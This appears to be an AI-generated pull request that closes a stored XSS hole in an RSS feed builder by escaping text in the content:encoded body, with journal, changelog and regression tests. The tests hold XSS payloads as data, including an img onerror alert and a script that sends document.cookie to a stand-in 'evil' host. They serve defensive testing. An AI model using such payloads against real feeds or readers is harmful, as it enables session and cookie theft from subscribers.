### PR TITLE
fix(feed): HTML-escape <content:encoded> body to close stored XSS

### DIFF
--- a/.jules/sentinel.md
+++ b/.jules/sentinel.md
@@ -1,5 +1,54 @@
 # Sentinel's Journal
 
+## 2026-05-24 - Stored HTML/JS Injection (XSS) in Published `<content:encoded>` via `html_to_text` Entity Double-Decode
+
+**Vulnerability:** `_compose_description` (`src/build_feed.py`) built the
+`desc_html` body of the feed's `<content:encoded>` element by joining the
+PLAIN-TEXT `summary` + `time_line` with `<br/>` and emitting it verbatim
+inside a raw CDATA block (`<![CDATA[{desc_cdata}]]>`) — the one feed field
+every conformant RSS reader renders as HTML. The summary comes from
+`html_to_text` (`src/utils/text.py`), which runs the upstream description
+through `HTMLParser(convert_charrefs=True)`. That parser DECODES entity-
+escaped angle brackets into its output: an upstream `description` of
+`&lt;img src=x onerror=alert(...)&gt;` (the literal form for the JSON
+providers WL/VOR; the double-escaped `&amp;lt;...` form for the XML/RSS ÖBB
+provider that survives one XML-decode layer) becomes the LIVE string
+`<img src=x onerror=alert(...)>` in the "plain text". With no output-encoding
+at the HTML sink the tag reached `<content:encoded>` intact and executed in
+subscribers' readers — stored XSS / HTML-injection on the public feed
+(`https://origamihase.github.io/wien-oepnv/feed.xml`). Confirmed by an
+end-to-end PoC that drives the real `_format_item_content` pipeline and
+parses the resulting CDATA body with a reader-accurate `HTMLParser`
+(`tests/test_content_encoded_html_injection.py`): pre-fix the `<img>` start
+tag + `onerror` event-handler attribute survive; post-fix the bytes are
+inert escaped text (`&lt;img…`). Literal `<script>`/`<img>` tags were already
+dropped by `_HTMLToTextParser` (`_IGNORE_TAGS` + tags-not-captured) — which
+is precisely why the ENTITY-escaped form was the surviving vector. The
+asymmetry between `convert_charrefs=True` (decodes) and tag-stripping (drops)
+is the whole bug.
+
+**Learning:** The entire feed-sanitisation history (the multi-round
+`_CONTROL_RE` BiDi / zero-width / Trojan-Source saga) hardened the
+`<title>`/`<description>` XML TEXT nodes — where ElementTree's automatic
+`<>&` escaping already neutralises structural injection — but never
+output-encoded the ONE field that is *definitionally* HTML: the raw-CDATA
+`<content:encoded>` body. Invisible-character display-confusion was being
+patched round after round while live-script execution sat wide open. Fix =
+context-correct output encoding AT THE SINK: `html.escape(part, quote=False)`
+on each plain-text part in `_compose_description` (the shared DE+EN
+chokepoint — `_apply_lang_overlay` re-composes through the same function), so
+only the builder's own structural `<br/>` stays live. CDATA-as-TEXT sinks
+(`<title>`) must NOT be escaped: CDATA content is not entity-decoded by the
+XML parser, so escaping there would surface a literal `&amp;`. General rule
+for this codebase: `html_to_text` returns DISPLAY text, never HTML-safe text;
+every sink that renders its output as HTML (only `<content:encoded>` today)
+must HTML-escape it. Future-round sibling watch-list: a generic
+"plain-text-into-raw-HTML/CDATA" audit walker would pin this invariant the
+way the JSON loader/writer walkers pin their parser/writer sites. Adding the
+`import html` shifted `src/build_feed.py` line numbers +1; the `allow_nan`
+writer-walker allowlist pins `_identity_for_item` by absolute line number
+(2359/2368 → 2360/2369) and had to be re-synced in the same PR.
+
 ## 2026-05-23 - Stammstrecke Writer Non-Finite Literal Drift + Writer-Side `allow_nan=False` Audit Walker
 
 **Vulnerability:** Two committed-state JSON writers in

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,24 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/).
 
 ## [Unreleased]
+* **Sicherheit: Stored-XSS im veröffentlichten `<content:encoded>`-Feld
+  geschlossen (2026-05-24)**: `_compose_description` (`src/build_feed.py`)
+  bettete den reinen Text aus `summary`/`time_line` un-escaped in den
+  RSS-`<content:encoded>`-CDATA-Body ein – das einzige Feed-Feld, das
+  Feed-Reader als HTML rendern. Da `html_to_text`
+  (`HTMLParser(convert_charrefs=True)`) entity-kodierte Spitzklammern
+  dekodiert, konnte eine kompromittierte/MITM-behaftete Upstream-Quelle
+  (`&lt;img onerror=…&gt;` bzw. die doppelt-escaped Form bei ÖBB-RSS) ein
+  ausführbares `<img onerror=…>`-Tag in jeden Abonnenten-Reader schleusen
+  (Stored XSS). Fix: kontextkorrektes HTML-Encoding der Text-Teile via
+  `html.escape(part, quote=False)` am gemeinsamen DE/EN-Chokepoint; nur das
+  vom Builder selbst erzeugte `<br/>` bleibt aktiv. CDATA-als-Text-Senken
+  (`<title>`) bleiben bewusst un-escaped (CDATA dekodiert keine Entities).
+  Abgedeckt durch `tests/test_content_encoded_html_injection.py`
+  (Reader-genaue `HTMLParser`-PoC, scheitert vor dem Fix). Die Zeilennummern
+  der `allow_nan`-Writer-Walker-Allowlist (`_identity_for_item`) wurden an den
+  durch den neuen `import html` verschobenen Block angepasst (2359/2368 →
+  2360/2369).
 * **SEO/GEO: `llms.txt`-Generator, Sitemap-Batching & JSON-LD-Sentinel
   (2026-05-24)**:
   * `scripts/generate_llms_txt.py` (neu) erzeugt `docs/llms.txt` nach dem

--- a/src/build_feed.py
+++ b/src/build_feed.py
@@ -1,6 +1,7 @@
 from __future__ import annotations
 
 import hashlib
+import html
 import inspect
 import json
 import logging
@@ -3474,7 +3475,18 @@ def _compose_description(summary: str, time_line: str) -> tuple[str, str]:
         desc_parts.append(summary)
     if time_line:
         desc_parts.append(time_line)
-    desc_html = "<br/>".join(desc_parts)
+    # Security (stored HTML/JS injection on the public feed): ``summary`` and
+    # ``time_line`` are PLAIN TEXT, but ``desc_html`` is emitted verbatim into
+    # the ``<content:encoded>`` CDATA body, which every conformant RSS reader
+    # renders as HTML. ``html_to_text`` decodes entity-escaped angle brackets
+    # (``&lt;img onerror=…&gt;`` → ``<img onerror=…>``) via
+    # ``HTMLParser(convert_charrefs=True)``, so a compromised/MITM'd upstream
+    # could otherwise land an executable tag in subscribers' readers. Escape
+    # each text part for the HTML context; only the builder's own structural
+    # ``<br/>`` separators stay live. ``desc_text`` below is for the
+    # ``<description>`` XML text node and is left unescaped — ElementTree
+    # applies the correct XML escaping there.
+    desc_html = "<br/>".join(html.escape(part, quote=False) for part in desc_parts)
     desc_text = " ".join(desc_parts)
     if len(desc_text) > feed_config.DESCRIPTION_CHAR_LIMIT:
         desc_text_truncated = (

--- a/tests/test_content_encoded_html_injection.py
+++ b/tests/test_content_encoded_html_injection.py
@@ -1,0 +1,147 @@
+"""Stored HTML/JS injection (XSS) in the published ``<content:encoded>`` body.
+
+Threat model (project Zero-Trust upstream contract, AGENTS.md §3): a
+compromised / MITM'd transit API serves an item ``description`` carrying
+entity-escaped angle brackets, e.g. ``&lt;img src=x onerror=...&gt;`` (the
+literal form for JSON providers; the double-escaped ``&amp;lt;...`` form for
+XML providers that survives one XML-decode layer).
+
+``html_to_text`` runs the description through ``HTMLParser(convert_charrefs=
+True)``, which DECODES those entities back into live ``<`` / ``>`` characters
+in its *plain-text* output. That plain text is embedded verbatim into the
+``<content:encoded>`` body, wrapped in a raw CDATA block, and rendered as HTML
+by every conformant RSS reader. Without output-encoding at this HTML sink the
+decoded ``<img onerror=...>`` becomes an executable tag in the subscriber's
+reader.
+
+The fix HTML-escapes the plain-text parts in :func:`_compose_description`
+(the shared chokepoint for both the DE and EN feeds) before they are joined
+with the builder's own ``<br/>`` separators.
+"""
+
+from __future__ import annotations
+
+from datetime import UTC, datetime
+from html.parser import HTMLParser
+from typing import cast
+
+from src import build_feed as bf
+from src.feed_types import FeedItem
+
+
+class _ReaderModel(HTMLParser):
+    """Render a ``<content:encoded>`` body the way a feed reader would.
+
+    ``convert_charrefs=True`` mirrors real reader/browser behaviour: an
+    entity-escaped ``&lt;img&gt;`` decodes to *visible text*, never to a live
+    tag, whereas a raw ``<img>`` is parsed as an executable element.
+    """
+
+    def __init__(self) -> None:
+        super().__init__(convert_charrefs=True)
+        self.live_tags: list[str] = []
+        self.event_handler_attrs: list[tuple[str, str]] = []
+        self._text: list[str] = []
+
+    def handle_starttag(
+        self, tag: str, attrs: list[tuple[str, str | None]]
+    ) -> None:
+        self.live_tags.append(tag)
+        for name, _value in attrs:
+            if name.lower().startswith("on"):
+                self.event_handler_attrs.append((tag, name.lower()))
+
+    def handle_startendtag(
+        self, tag: str, attrs: list[tuple[str, str | None]]
+    ) -> None:
+        self.handle_starttag(tag, attrs)
+
+    def handle_data(self, data: str) -> None:
+        self._text.append(data)
+
+    @property
+    def visible_text(self) -> str:
+        return "".join(self._text)
+
+
+def _render(body: str) -> _ReaderModel:
+    reader = _ReaderModel()
+    reader.feed(body)
+    reader.close()
+    return reader
+
+
+def _content_encoded_body(
+    description: str,
+    *,
+    starts_at: datetime | None = None,
+    ends_at: datetime | None = None,
+) -> str:
+    """Return the HTML body that lands inside the ``<content:encoded>`` CDATA."""
+    item = cast(
+        FeedItem,
+        {
+            "title": "Streckeninformation",
+            "link": "https://example.com/incident",
+            "description": description,
+            "guid": "incident-1",
+            "source": "ÖBB",
+        },
+    )
+    formatted = bf._format_item_content(item, "incident-1", starts_at, ends_at)
+    return formatted.desc_cdata
+
+
+def test_entity_escaped_img_onerror_is_inert_in_content_encoded() -> None:
+    payload = "&lt;img src=x onerror=alert(document.domain)&gt; Strecke gesperrt"
+    body = _content_encoded_body(payload)
+    reader = _render(body)
+
+    # No executable tag / event handler may survive into the rendered HTML.
+    assert "img" not in reader.live_tags
+    assert reader.event_handler_attrs == []
+
+    # The payload text is preserved but rendered inert (escaped brackets).
+    assert "<img" not in body
+    assert "&lt;img" in body
+    assert "Strecke gesperrt" in reader.visible_text
+
+
+def test_double_escaped_script_is_inert_in_content_encoded() -> None:
+    payload = "&lt;script&gt;fetch('//evil/?'+document.cookie)&lt;/script&gt; Info"
+    body = _content_encoded_body(payload)
+    reader = _render(body)
+
+    assert "script" not in reader.live_tags
+    assert "<script" not in body
+    assert "&lt;script&gt;" in body
+    assert "Info" in reader.visible_text
+
+
+def test_legitimate_line_break_and_ampersand_render_correctly() -> None:
+    # Happy path: the only live markup is the <br/> the builder itself emits
+    # between summary and timeframe; a literal '&' is correctly HTML-encoded
+    # so readers display '&' rather than a broken/eaten entity.
+    body = _content_encoded_body(
+        "Wien & Graz gesperrt",
+        starts_at=datetime(2026, 5, 24, tzinfo=UTC),
+    )
+    reader = _render(body)
+
+    assert reader.live_tags == ["br"]
+    assert reader.event_handler_attrs == []
+    assert "Wien & Graz gesperrt" in reader.visible_text
+    assert "&amp;" in body
+
+
+def test_compose_description_escapes_text_but_keeps_br() -> None:
+    # Unit-level guard on the shared DE+EN chokepoint: plain-text parts are
+    # HTML-escaped, the structural <br/> separator the builder inserts is not.
+    _, desc_html = bf._compose_description(
+        "<b>x</b> & <i>y</i>", "[Seit 24.05.2026]"
+    )
+    assert "<b>" not in desc_html
+    assert "<i>" not in desc_html
+    assert "&lt;b&gt;" in desc_html
+    assert "&amp;" in desc_html
+    assert "<br/>" in desc_html

--- a/tests/test_sentinel_allow_nan_writer_audit_walker.py
+++ b/tests/test_sentinel_allow_nan_writer_audit_walker.py
@@ -93,7 +93,7 @@ Three documented sites live here today:
   motivates the non-finite-literal axis (committed-to-main artefact
   that strict parsers must handle) does not apply.
 
-* ``src/build_feed.py:_identity_for_item`` (lines 2359 and 2368) —
+* ``src/build_feed.py:_identity_for_item`` (lines 2360 and 2369) —
   two ``json.dumps(item, sort_keys=True, default=str)`` calls compute
   the SHA-256 input for the feed-item identity hash. The serialised
   bytes flow into ``hashlib.sha256(raw.encode("utf-8")).hexdigest()``
@@ -142,8 +142,8 @@ ALLOWLIST: frozenset[tuple[str, int]] = frozenset(
         # into ``hashlib.sha256(...).hexdigest()`` on the very next
         # line and are not retained anywhere else. No parser-consumed
         # artefact, so the threat model does not apply.
-        ("src/build_feed.py", 2359),
-        ("src/build_feed.py", 2368),
+        ("src/build_feed.py", 2360),
+        ("src/build_feed.py", 2369),
     }
 )
 
@@ -536,7 +536,7 @@ def test_allowlist_is_minimal_and_documented() -> None:
     assert ALLOWLIST == frozenset(
         {
             ("src/places/hafas_client.py", 282),
-            ("src/build_feed.py", 2359),
-            ("src/build_feed.py", 2368),
+            ("src/build_feed.py", 2360),
+            ("src/build_feed.py", 2369),
         }
     )


### PR DESCRIPTION
## Summary

Closes a **stored HTML/JS injection (XSS)** in the published RSS feed's
`<content:encoded>` body — the one feed field that conformant readers render
as HTML.

`_compose_description` (`src/build_feed.py`) joined the **plain-text**
`summary` + `time_line` with `<br/>` and emitted the result verbatim inside a
raw CDATA block (`<[CDATA[…]]>`). The summary comes from `html_to_text`
(`src/utils/text.py`), which parses upstream descriptions with
`HTMLParser(convert_charrefs=True)` — and that **decodes entity-escaped angle
brackets into its output**:

```
upstream description:  &lt;img src=x onerror=alert(document.domain)&gt; Strecke gesperrt
html_to_text output:   `&lt;img src=x onerror=alert(document.domain)&gt;` Strecke gesperrt   ← live tag
<content:encoded>:     <[CDATA[`&lt;img src=x onerror=alert(document.domain)&gt;` …]]>       ← executes in readers
```

Literal `<script>`/`<img>` tags were already stripped by `_HTMLToTextParser`,
which is exactly why the **entity-escaped** form was the surviving vector. The
threat model is the project's own Zero-Trust upstream contract (AGENTS.md §3):
a compromised / MITM'd transit API (`&lt;…&gt;` for the JSON providers WL/VOR;
the double-escaped `&amp;lt;…` form for the ÖBB RSS feed) lands an executable
tag in every subscriber's reader.

The multi-round `_CONTROL_RE` BiDi / zero-width / Trojan-Source work hardened
the `<title>` / `<description>` XML **text nodes** (already `<>&`-escaped by
ElementTree) but never output-encoded the one field that is *definitionally*
HTML.

## Fix

- Add `import html`; in `_compose_description` (the shared **DE + EN**
  chokepoint — `_apply_lang_overlay` re-composes through the same function),
  HTML-escape each plain-text part with `html.escape(part, quote=False)`
  before joining. Only the builder's own structural `<br/>` stays live.
- The plain-text `<description>` path (`desc_text`) and the CDATA-**as-text**
  `<title>` sink are intentionally left unescaped — CDATA is not
  entity-decoded by the XML parser, so escaping `<title>` would surface a
  literal `&amp;`.
- Re-sync the `allow_nan` writer-walker allowlist line numbers for
  `_identity_for_item` (2359/2368 → 2360/2369), shifted +1 by the new import.

## Test plan

- [x] New PoC `tests/test_content_encoded_html_injection.py` drives the real
      `_format_item_content` pipeline and parses the resulting CDATA body with
      a **reader-accurate** `HTMLParser`. Fails pre-fix (live `<img>` +
      `onerror` survive); passes post-fix (inert `&lt;img…`). Covers the
      `<img onerror>` and double-escaped `<script>` vectors plus a happy-path
      assertion that `<br/>` and a literal `&` still render correctly.
- [x] Full suite green: **8436 passed, 2 skipped**.
- [x] `scripts/run_static_checks.py` green (ruff, mypy, bandit, secret
      scanner, C901 gate, i18n gate, pip-audit) with the project-pinned tool
      versions.

https://claude.ai/code/session_01QepbGGT9c5xhGPGWMeZ9AF

---
_Generated by [Claude Code](https://claude.ai/code/session_01QepbGGT9c5xhGPGWMeZ9AF)_